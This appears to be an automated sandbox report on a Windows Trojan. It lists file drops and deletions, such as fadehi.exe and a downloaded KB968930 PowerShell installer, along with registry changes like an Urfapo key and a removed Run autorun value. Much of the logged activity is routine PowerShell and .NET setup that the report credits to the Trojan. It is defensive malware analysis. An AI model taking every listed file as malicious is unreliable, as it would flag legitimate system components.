%System%\wsmprovhost.exe (0 bytes)
%System%\winrm\0409\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%WinDir%\inf\SET38.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)

The process PSCustomSetupUtil.exe:620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\3LPSVY14\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\VEHKNRUX\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:3908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\FY147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:1924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\XFJMPSVY\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:3064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\2MPSVY14\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:2308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\RADGKNQT\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSCustomSetupUtil.exe:2224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CX148BEH\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:3696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\3MPSVY15\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:3856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\XFILORVY\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:2176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\L47ADHKN\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:2112 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\HZ258BEH\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\O7ADGKNQ\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\VDGJNQTW\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:2288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\K258CFIL\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\YGKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ATWZ258B\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\J258CFIL\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:1496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\7QTWZ258\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\0JMPSVY1\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:1868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\RBEHKNRT\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:1284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\WEHKNRUX\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\TBEILORU\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GY147ADG\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process yfenaromaf.exe:1664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (7385 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (0 bytes)

The process PSSetupNativeUtils.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)

The process mscorsvw.exe:3128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (68628 bytes)

The process mscorsvw.exe:2592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)

The process mscorsvw.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)

The process mscorsvw.exe:2072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)

The process mscorsvw.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)

The process mscorsvw.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)

The process regsvr32.exe:3264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (1683 bytes)
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb (4108 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpf7521b9d\bindata865.exe (0 bytes)

The process regsvr32.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)

Registry activity

The process %original file name%.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 21 26 24 42 0D 64 B0 0A 16 86 EB 7C E3 5A 7D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process mofcomp.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 51 16 36 9F 50 0D 16 B3 23 94 51 4D 35 C6 C3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process WindowsXP-KB968930-x86-ENG.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 82 8F CC A9 A1 40 A4 F8 51 2C 10 56 2A E6 06"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process new.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 58 BA 41 08 9A 12 3C 9B D7 93 76 94 2E 20 36"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"{D53EE03B-A6B3-2507-CA3C-8ED347A30FAD}"

The process new.exe:3064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B B8 C8 2C 8F 04 92 5E 14 20 4A 9A 40 F9 90 92"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net1.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 0E E4 26 9D 40 9F 1E 08 69 C4 F0 93 15 EF 23"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process tasklist.exe:2264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 03 B3 D6 66 83 A3 48 34 6C DF 99 8F 6B 7D 31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 36 64 D7 9E FF B0 20 FC 56 F3 67 C9 FC EC 94"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 5F AD 6C EC 7C 62 7F BA C4 FA 70 46 1A 06 A3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 C6 03 F0 C9 84 43 E1 6C 20 5B 4D 57 22 90 6B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 56 86 4C 8D 9E 46 D1 19 B7 8E FA 9D D9 85 D6"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C D6 B0 CB FC CB 8B 30 89 87 F7 CF 2E 72 FB 08"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 81 77 D3 FF 89 57 BA 30 00 65 04 B7 50 54 0E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 A0 EE 99 9F 38 2C 67 59 66 B0 8C CD 5E F2 41"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

